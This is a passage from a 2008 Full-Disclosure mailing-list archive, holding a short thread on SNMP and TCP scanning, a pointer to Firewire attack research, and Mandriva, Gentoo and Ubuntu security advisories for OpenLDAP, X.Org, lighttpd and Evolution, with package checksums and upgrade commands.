Bernhard Mueller Security Consultant SEC Consult Unternehmensberatung GmbH www.sec-consult.com A-1190 Vienna, Mooslackengasse 17 phone +43 1 8903043 34 fax +43 1 8903043 15 mobile +43 676 840301 718 email b.mueller at sec-consult.com Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 Firmensitz: Prof. Dr. Stephan Korenstra?e 10, A-2700 Wiener Neustadt Advisor for your information security. From hackbunny at s0ftpj.org Wed Mar 5 16:10:07 2008 From: hackbunny at s0ftpj.org (KJK::Hyperion) Date: Wed, 05 Mar 2008 17:10:07 +0100 Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP! In-Reply-To: <8805f1180803050520h4360a708j2b2122d05bfffc09@mail.gmail.com> References: <20080304085355.GA19264@suse.de> <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com> <8805f1180803050520h4360a708j2b2122d05bfffc09@mail.gmail.com> Message-ID: <47CEC5DF.2030000@s0ftpj.org> sub ha scritto: > "Previous scanning worms, such as Code Red, spread via many threads, > each invoking connect() to probe random addresses. what the hell is this? visiting the iniquity of the applications upon the protocols? Winsock is probably the only API that lets you connect() asynchronously (via the "non-standard" ConnectEx extension, but still). And if you have access to raw sockets, the whole point is moot because (IIRC) the advantages of SYN cookies work both ways (Oops, sorry for the copy to your inbox, sub. Blame the mailing list administrators, Thunderbird's clunky UI and my lazyness) From sub at room641a.net Wed Mar 5 13:26:00 2008 From: sub at room641a.net (sub) Date: Wed, 5 Mar 2008 08:26:00 -0500 Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP! In-Reply-To: References: <20080304085355.GA19264@suse.de> <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com> Message-ID: <8805f1180803050526pccf8db2r5834d5113f400e2d@mail.gmail.com> No, but if you're querying the services for data you do. On 3/5/08, Dmitry wrote: > dude, you don't need the entire handshake for tcp scanning. > > From security at mandriva.com Wed Mar 5 19:32:25 2008 From: security at mandriva.com (security at mandriva.com) Date: Wed, 05 Mar 2008 12:32:25 -0700 Subject: [Full-disclosure] [ MDVSA-2008:058 ] - Updated openldap packages fix multiple vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:058 http://www.mandriva.com/security/ _______________________________________________________________________ Package : openldap Date : March 5, 2008 Affected: 2007.0, 2007.1, 2008.0, Corporate 4.0 _______________________________________________________________________ Problem Description: A vulnerability was found in slapo-pcache in slapd of OpenLDAP prior to 2.3.39 when running as a proxy-caching server. It would allocate memory using a malloc variant rather than calloc, which prevented an array from being properly initialized and could possibly allow attackers to cause a denial of service (CVE-2007-5708). Two vulnerabilities were found in how slapd handled modify (prior to 2.3.26) and modrdn (prior to 2.3.29) requests with NOOP control on objects stored in the BDB backend. An authenticated user with permission to perform modify (CVE-2007-6698) or modrdn (CVE-2008-0658) operations could cause slapd to crash. The updated packages have been patched to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5708 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6698 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0658 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: d4427f6f960dceb0a54887395688b02d 2007.0/i586/libldap2.3_0-2.3.27-2.2mdv2007.0.i586.rpm fb96499f3a33a20274b95ae1fe986938 2007.0/i586/libldap2.3_0-devel-2.3.27-2.2mdv2007.0.i586.rpm 0fe0f9a22d5a3d2b8d07170f7e02c360 2007.0/i586/libldap2.3_0-static-devel-2.3.27-2.2mdv2007.0.i586.rpm 248f3a65f570e22b7d1ec67e95a0249e 2007.0/i586/openldap-2.3.27-2.2mdv2007.0.i586.rpm 0ecb5d940de1ec31b1191110d3b40e4e 2007.0/i586/openldap-clients-2.3.27-2.2mdv2007.0.i586.rpm 43170f54bac53b30c6129b07253ab7f6 2007.0/i586/openldap-doc-2.3.27-2.2mdv2007.0.i586.rpm 16a103849faddc8b9e300bd7738b5bde 2007.0/i586/openldap-servers-2.3.27-2.2mdv2007.0.i586.rpm 53476478b042cbbbb2e59edf5a2ff330 2007.0/SRPMS/openldap-2.3.27-2.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: eb36e1526f2b3a3a03271edf66d2cca4 2007.0/x86_64/lib64ldap2.3_0-2.3.27-2.2mdv2007.0.x86_64.rpm 6b37c2ee41eb94cb65ec40d551538022 2007.0/x86_64/lib64ldap2.3_0-devel-2.3.27-2.2mdv2007.0.x86_64.rpm 6f009e31ac35621ffa9247501d583ed1 2007.0/x86_64/lib64ldap2.3_0-static-devel-2.3.27-2.2mdv2007.0.x86_64.rpm 445fb7aeb7818f0358659c91fb8ada70 2007.0/x86_64/openldap-2.3.27-2.2mdv2007.0.x86_64.rpm 3cc4725e66a377e07e908f48ee149acb 2007.0/x86_64/openldap-clients-2.3.27-2.2mdv2007.0.x86_64.rpm c5ba86642d7c9e6f3fe51d1201f9596c 2007.0/x86_64/openldap-doc-2.3.27-2.2mdv2007.0.x86_64.rpm 13f4514be8c8f989cc4a1537ec8f8177 2007.0/x86_64/openldap-servers-2.3.27-2.2mdv2007.0.x86_64.rpm 53476478b042cbbbb2e59edf5a2ff330 2007.0/SRPMS/openldap-2.3.27-2.2mdv2007.0.src.rpm Mandriva Linux 2007.1: 7cc3081ddcfd3db452d2e90036e3a628 2007.1/i586/libldap2.3_0-2.3.34-5.2mdv2007.1.i586.rpm fbc6f5333b7ca7796d95e8a3718f164a 2007.1/i586/libldap2.3_0-devel-2.3.34-5.2mdv2007.1.i586.rpm e7d258fa40a2a5c52314c856b3bc4fc1 2007.1/i586/libldap2.3_0-static-devel-2.3.34-5.2mdv2007.1.i586.rpm 589ef40a1af243f7664965fe090f7de2 2007.1/i586/openldap-2.3.34-5.2mdv2007.1.i586.rpm ce64d22f74a555746a408d86ab5c24cb 2007.1/i586/openldap-clients-2.3.34-5.2mdv2007.1.i586.rpm 35e5939274493799d93f2eca1388420a 2007.1/i586/openldap-doc-2.3.34-5.2mdv2007.1.i586.rpm 4dd84314508659366aaf95027f37896d 2007.1/i586/openldap-servers-2.3.34-5.2mdv2007.1.i586.rpm 1117b03409884c7799a1f7fd4ac29725 2007.1/i586/openldap-testprogs-2.3.34-5.2mdv2007.1.i586.rpm 67f80a1770d45f7e7e294bd8ec92846e 2007.1/i586/openldap-tests-2.3.34-5.2mdv2007.1.i586.rpm a686ce5b015b7accd63d327a0f898d84 2007.1/SRPMS/openldap-2.3.34-5.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: d47695976ba1bb63169509da41e57e07 2007.1/x86_64/lib64ldap2.3_0-2.3.34-5.2mdv2007.1.x86_64.rpm e6223017fb3b35792e680db1203aca6c 2007.1/x86_64/lib64ldap2.3_0-devel-2.3.34-5.2mdv2007.1.x86_64.rpm 320f8173708590828f70b4995d8ef2a8 2007.1/x86_64/lib64ldap2.3_0-static-devel-2.3.34-5.2mdv2007.1.x86_64.rpm 3b008b7ed26ea10234a13289e84f9388 2007.1/x86_64/openldap-2.3.34-5.2mdv2007.1.x86_64.rpm c158c817b74e2c1e678e8d34fef24a0e 2007.1/x86_64/openldap-clients-2.3.34-5.2mdv2007.1.x86_64.rpm 7b457f83f95361b82e3340cdbc5dcff1 2007.1/x86_64/openldap-doc-2.3.34-5.2mdv2007.1.x86_64.rpm fde2e695d34441ae77714de0fb42d1ba 2007.1/x86_64/openldap-servers-2.3.34-5.2mdv2007.1.x86_64.rpm 96715702c27b99497c5ec7aa917fb586 2007.1/x86_64/openldap-testprogs-2.3.34-5.2mdv2007.1.x86_64.rpm f55189544f96a7de67af997eae52631b 2007.1/x86_64/openldap-tests-2.3.34-5.2mdv2007.1.x86_64.rpm a686ce5b015b7accd63d327a0f898d84 2007.1/SRPMS/openldap-2.3.34-5.2mdv2007.1.src.rpm Mandriva Linux 2008.0: 50d197a5004773e80a4fa3fbf64f683b 2008.0/i586/libldap2.3_0-2.3.38-3.2mdv2008.0.i586.rpm 3fb1cbd91ce0b520f1185883ba6631e4 2008.0/i586/libldap2.3_0-devel-2.3.38-3.2mdv2008.0.i586.rpm e6afb970700d63e982fb62108a5483af 2008.0/i586/libldap2.3_0-static-devel-2.3.38-3.2mdv2008.0.i586.rpm bbdc4dc9929c911d63638833b636da11 2008.0/i586/openldap-2.3.38-3.2mdv2008.0.i586.rpm 21ba24d4b6f8b09f7870e94c983e5706 2008.0/i586/openldap-clients-2.3.38-3.2mdv2008.0.i586.rpm 8b12e3e7f72ca68c7839a4deccbd8781 2008.0/i586/openldap-doc-2.3.38-3.2mdv2008.0.i586.rpm 04abf0a21b507a3626667f4bc7755738 2008.0/i586/openldap-servers-2.3.38-3.2mdv2008.0.i586.rpm fd6652cb4645b22b77afaa5e7d46c5b8 2008.0/i586/openldap-testprogs-2.3.38-3.2mdv2008.0.i586.rpm 14690bfcbf5c3cbaf9f34e86fe812d58 2008.0/i586/openldap-tests-2.3.38-3.2mdv2008.0.i586.rpm d04ebbb872eecb60934dbda7ad8cc310 2008.0/SRPMS/openldap-2.3.38-3.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: e743f1c46812c62178d82792e78580b3 2008.0/x86_64/lib64ldap2.3_0-2.3.38-3.2mdv2008.0.x86_64.rpm 02a8a95838044337c7c2813b2b6158cb 2008.0/x86_64/lib64ldap2.3_0-devel-2.3.38-3.2mdv2008.0.x86_64.rpm 4497a989916bda44db6bd5ce93373907 2008.0/x86_64/lib64ldap2.3_0-static-devel-2.3.38-3.2mdv2008.0.x86_64.rpm a0c92471258de04a589a651bd571ece6 2008.0/x86_64/openldap-2.3.38-3.2mdv2008.0.x86_64.rpm 16268ccf7f5fbc375c4fd8313bd389de 2008.0/x86_64/openldap-clients-2.3.38-3.2mdv2008.0.x86_64.rpm 72de58e66a16f68212bff5fb899cf44c 2008.0/x86_64/openldap-doc-2.3.38-3.2mdv2008.0.x86_64.rpm 7510f04c21750fca734ad4bd9c0b336e 2008.0/x86_64/openldap-servers-2.3.38-3.2mdv2008.0.x86_64.rpm 353a580e2280b765e99906cd598f641a 2008.0/x86_64/openldap-testprogs-2.3.38-3.2mdv2008.0.x86_64.rpm 1170527a0621b41bb9257bb3e1922dc1 2008.0/x86_64/openldap-tests-2.3.38-3.2mdv2008.0.x86_64.rpm d04ebbb872eecb60934dbda7ad8cc310 2008.0/SRPMS/openldap-2.3.38-3.2mdv2008.0.src.rpm Corporate 4.0: 4f14a96268be28e1a5b486e153080ff8 corporate/4.0/i586/libldap2.3_0-2.3.27-1.4.20060mlcs4.i586.rpm 00a834b2fa4941e2c1a4a58c6c034df6 corporate/4.0/i586/libldap2.3_0-devel-2.3.27-1.4.20060mlcs4.i586.rpm b21351bf410ad80dd2165cd680ec5512 corporate/4.0/i586/libldap2.3_0-static-devel-2.3.27-1.4.20060mlcs4.i586.rpm f76ddc4f7daef7163d2b6ae3dc159bfa corporate/4.0/i586/openldap-2.3.27-1.4.20060mlcs4.i586.rpm 4f39a60ebc0f10b448249a6fd391881a corporate/4.0/i586/openldap-clients-2.3.27-1.4.20060mlcs4.i586.rpm 56c6a71605ef78d91f39764a6bd5805c corporate/4.0/i586/openldap-doc-2.3.27-1.4.20060mlcs4.i586.rpm 278c5076219f41b620fe4be209b560f6 corporate/4.0/i586/openldap-servers-2.3.27-1.4.20060mlcs4.i586.rpm 2ae4d3fde1ca0cdc2718edba0ed5caa7 corporate/4.0/SRPMS/openldap-2.3.27-1.4.20060mlcs4.src.rpm Corporate 4.0/X86_64: 001e7ac83e8b0f4bd786c7a34b18bc6f corporate/4.0/x86_64/lib64ldap2.3_0-2.3.27-1.4.20060mlcs4.x86_64.rpm 3a383bce15adeb349f2cbc2e2e09e617 corporate/4.0/x86_64/lib64ldap2.3_0-devel-2.3.27-1.4.20060mlcs4.x86_64.rpm fb829cc7b376913774f7e17f63126ea7 corporate/4.0/x86_64/lib64ldap2.3_0-static-devel-2.3.27-1.4.20060mlcs4.x86_64.rpm 8cf4600913c6f0480dcb4a83a2caf97e corporate/4.0/x86_64/openldap-2.3.27-1.4.20060mlcs4.x86_64.rpm ebee2e465a241aef5a6317dff68cf939 corporate/4.0/x86_64/openldap-clients-2.3.27-1.4.20060mlcs4.x86_64.rpm b27b946152945b36385ed80cfaca5960 corporate/4.0/x86_64/openldap-doc-2.3.27-1.4.20060mlcs4.x86_64.rpm e567e790d1ae957531f899cb6fc766cf corporate/4.0/x86_64/openldap-servers-2.3.27-1.4.20060mlcs4.x86_64.rpm 2ae4d3fde1ca0cdc2718edba0ed5caa7 corporate/4.0/SRPMS/openldap-2.3.27-1.4.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (GNU/Linux) iD4DBQFHzsnrmqjQ0CJFipgRAjZAAKCvb4GW3/uY7uLIBuTkI5eqiVzkOACY0HKn tOFiQm6cMHQ8KwyDVlpFDA== =lnDg -----END PGP SIGNATURE----- From Thierry at Zoller.lu Wed Mar 5 18:29:58 2008 From: Thierry at Zoller.lu (Thierry Zoller) Date: Wed, 5 Mar 2008 19:29:58 +0100 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <1204732416.6997.53.camel@b4byl0n> References: <1204732416.6997.53.camel@b4byl0n> Message-ID: <729632816.20080305192958@Zoller.lu> Dear All, That said the original work on this from metlstorm is in the news [1] and can be found here : http://storm.net.nz/projects/16 [1] http://it.slashdot.org/article.pl?sid=08/03/04/1258210&from=rss -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 From rbu at gentoo.org Wed Mar 5 20:48:03 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Wed, 5 Mar 2008 21:48:03 +0100 Subject: [Full-disclosure] ERRATA: [ GLSA 200801-09 ] X.Org X server and Xfont library: Multiple vulnerabilities Message-ID: <200803052148.03360.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory [ERRATA UPDATE] GLSA 200801-09:03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: X.Org X server and Xfont library: Multiple vulnerabilities Date: January 20, 2008 Updated: March 05, 2008 Bugs: #204362, #208343 ID: 200801-09:03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Errata ====== The previous version of the X.Org X server (1.3.0.0-r4) did not properly address the integer overflow vulnerability in the MIT-SHM extension (CVE-2007-6429). It failed to check on Pixmaps of certain bit depths. All users of the X.Org X server package should upgrade to x11-base/xorg-server-1.3.0.0-r5. The corrected sections appear below. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 x11-base/xorg-server < 1.3.0.0-r5 >= 1.3.0.0-r5 2 x11-libs/libXfont < 1.3.1-r1 >= 1.3.1-r1 ------------------------------------------------------------------- 2 affected packages on all of their supported architectures. ------------------------------------------------------------------- Resolution ========== All X.Org X server users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=x11-base/xorg-server-1.3.0.0-r5" All X.Org Xfont library users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=x11-libs/libXfont-1.3.1-r1" References ========== [ 1 ] CVE-2007-5760 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5760 [ 2 ] CVE-2007-5958 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5958 [ 3 ] CVE-2007-6427 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6427 [ 4 ] CVE-2007-6428 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6428 [ 5 ] CVE-2007-6429 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6429 [ 6 ] CVE-2008-0006 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0006 [ 7 ] X.Org security advisory http://lists.freedesktop.org/archives/xorg/2008-January/031918.html Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200801-09.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080305/122f755e/attachment.bin From py at gentoo.org Wed Mar 5 21:42:36 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Wed, 05 Mar 2008 22:42:36 +0100 Subject: [Full-disclosure] [ GLSA 200803-10 ] lighttpd: Multiple vulnerabilities Message-ID: <47CF13CC.4040909@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: lighttpd: Multiple vulnerabilities Date: March 05, 2008 Bugs: #211230, #211956 ID: 200803-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been discovered in lighttpd. Background ========== lighttpd is a lightweight high-performance web server. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-servers/lighttpd < 1.4.18-r2 >= 1.4.18-r2 Description =========== lighttpd contains a calculation error when allocating the global file descriptor array (CVE-2008-0983). Furthermore, it sends the source of a CGI script instead of returning a 500 error (Internal Server Error) when the fork() system call fails (CVE-2008-1111). Impact ====== A remote attacker could exploit these vulnerabilities to cause a Denial of Service or gain the source of a CGI script. Workaround ========== There is no known workaround at this time. Resolution ========== All lighttpd users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-servers/lighttpd-1.4.18-r2" References ========== [ 1 ] CVE-2008-0983 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0983 [ 2 ] CVE-2008-1111 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1111 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-10.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzxPMuhJ+ozIKI5gRAungAJwINfZC2FZ4iEIxlamiBUjwmlflUgCfXXCM LORr9FwlLB0pZuIR6aJJFGE= =uoUo -----END PGP SIGNATURE----- From kees at ubuntu.com Wed Mar 5 20:37:28 2008 From: kees at ubuntu.com (Kees Cook) Date: Wed, 5 Mar 2008 12:37:28 -0800 Subject: [Full-disclosure] [USN-583-1] Evolution vulnerability Message-ID: <20080305203728.GF27247@outflux.net> =========================================================== Ubuntu Security Notice USN-583-1 March 05, 2008 evolution vulnerability CVE-2008-0072 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: evolution 2.6.1-0ubuntu7.2 Ubuntu 6.10: evolution 2.8.1-0ubuntu4.2 Ubuntu 7.04: evolution 2.10.1-0ubuntu2.1 Ubuntu 7.10: evolution 2.12.1-0ubuntu1.1 After a standard system upgrade you need to restart Evolution to effect the necessary changes. Details follow: Ulf Harnhammar discovered that Evolution did not correctly handle format strings when processing encrypted emails. A remote attacker could exploit this by sending a specially crafted email, resulting in arbitrary code execution. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.6.1-0ubuntu7.2.diff.gz Size/MD5: 203646 3015e8026cd5a91df8cb673c5fc39d40 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.6.1-0ubuntu7.2.dsc Size/MD5: 1402 0a32038fe5e071cb4c12935acf639c02 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.6.1.orig.tar.gz Size/MD5: 17037346 e2ba35f5eaa324d0eb552c1c87405042 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.6.1-0ubuntu7.2_amd64.deb Size/MD5: 6578230 ef179b357cb7b454ae8393a366021314 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.6.1-0ubuntu7.2_amd64.deb Size/MD5: 216368 2d6ed392b174e90f21163fcc2163996c http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.6.1-0ubuntu7.2_amd64.deb Size/MD5: 333036 9583853b8fc369d9e991f20d25a92d53 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.6.1-0ubuntu7.2_amd64.deb Size/MD5: 4956256 897c8ff77d8826f2e3c66219c093a7e2 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.6.1-0ubuntu7.2_i386.deb Size/MD5: 5741688 8d351e2a18ffa7de3009dd954b140f61 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.6.1-0ubuntu7.2_i386.deb Size/MD5: 216404 c75bba76d46736190548a063af944501 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.6.1-0ubuntu7.2_i386.deb Size/MD5: 304890 3fa8a69f8fbaffed47da761c0a7ce554 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.6.1-0ubuntu7.2_i386.deb Size/MD5: 4696720 155764faf320f37775cec333b9860a0d powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.6.1-0ubuntu7.2_powerpc.deb Size/MD5: 6513184 d710da9eb147e08928020cee44565b18 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.6.1-0ubuntu7.2_powerpc.deb Size/MD5: 216408 48c0b9b3bd11332e796a3bba406ad990 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.6.1-0ubuntu7.2_powerpc.deb Size/MD5: 348230 8b3f5779fd665287f97f91ed68974571 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.6.1-0ubuntu7.2_powerpc.deb Size/MD5: 4838748 e94f9f1cb37ad60da4e7a9ba71607edb sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.6.1-0ubuntu7.2_sparc.deb Size/MD5: 5824958 a1e84f2d584e46c40885b83498bf44a3 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.6.1-0ubuntu7.2_sparc.deb Size/MD5: 216442 431edde18d17dcea720845998d07beb8 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.6.1-0ubuntu7.2_sparc.deb Size/MD5: 304852 6b5b4d337f54af40bd98a57315da5b5b http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.6.1-0ubuntu7.2_sparc.deb Size/MD5: 4781836 6868fc03608119df8aa837556756be84 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.8.1-0ubuntu4.2.diff.gz Size/MD5: 362867 c15866200e4d0b7e0e78895cf8e6fbc0 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.8.1-0ubuntu4.2.dsc Size/MD5: 1373 f78da23f7ff3d726376659333ed21dee http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.8.1.orig.tar.gz Size/MD5: 17782443 0ce38f1ae7992e00eec3414e62cb3a59 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.8.1-0ubuntu4.2_amd64.deb Size/MD5: 6569214 c98c86c7f54f44f904b6b2f46db06d8d http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.8.1-0ubuntu4.2_amd64.deb Size/MD5: 212428 a5f0b0647e9caa73e0da8024801754eb http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.8.1-0ubuntu4.2_amd64.deb Size/MD5: 124114 cd31ef1f61924092dce2ea3b59d30d56 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.8.1-0ubuntu4.2_amd64.deb Size/MD5: 5341254 073a1cb3846675a84ee03cf150d32733 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.8.1-0ubuntu4.2_i386.deb Size/MD5: 6183708 68f4f445ea20a62fab5939c4efa0add5 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.8.1-0ubuntu4.2_i386.deb Size/MD5: 212484 83e502706ad5f53ccbeba4234d98064e http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.8.1-0ubuntu4.2_i386.deb Size/MD5: 119126 d064848f9f685b148b3c0ceda43fb52a http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.8.1-0ubuntu4.2_i386.deb Size/MD5: 5143158 acca4640a33498e41f0e6f4461271672 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.8.1-0ubuntu4.2_powerpc.deb Size/MD5: 6567194 8aed4b3cdf709f34fcc60b5067bcf4dd http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.8.1-0ubuntu4.2_powerpc.deb Size/MD5: 212446 00462788cb67e75cac1e2687c20e6ffc http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.8.1-0ubuntu4.2_powerpc.deb Size/MD5: 132302 9650f4d2f13a3fd573ed8a39ea05f802 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.8.1-0ubuntu4.2_powerpc.deb Size/MD5: 5242744 68d3c8fcef84a0b9d5f23e37b57cdc4a sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.8.1-0ubuntu4.2_sparc.deb Size/MD5: 6084210 3aa6eb0c11ad1d02b19f482b1d2ea554 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.8.1-0ubuntu4.2_sparc.deb Size/MD5: 212440 f024f02f296d8f7e3ca78c2c4ca0560e http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.8.1-0ubuntu4.2_sparc.deb Size/MD5: 117344 f0182a162e3f9086ad569c7af0eab6fb http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.8.1-0ubuntu4.2_sparc.deb Size/MD5: 5152234 531bcc5955ab7244661c6c89df540669 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.10.1-0ubuntu2.1.diff.gz Size/MD5: 210525 bbf6602b7424c10413186f474b000a44 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.10.1-0ubuntu2.1.dsc Size/MD5: 2018 40f16cda1b6747a92097590ea38d361b http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.10.1.orig.tar.gz Size/MD5: 20875752 43db33a2608916fbbecbb794b7de0924 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-common_2.10.1-0ubuntu2.1_all.deb Size/MD5: 19353724 c5d08b1384dd44641160b871ee2fe103 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.10.1-0ubuntu2.1_amd64.deb Size/MD5: 6713478 112289645affd984a37285f58ebe897e http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.10.1-0ubuntu2.1_amd64.deb Size/MD5: 216464 d9c7862e8bcb8ff36c04a8d7df1747dc http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.10.1-0ubuntu2.1_amd64.deb Size/MD5: 136364 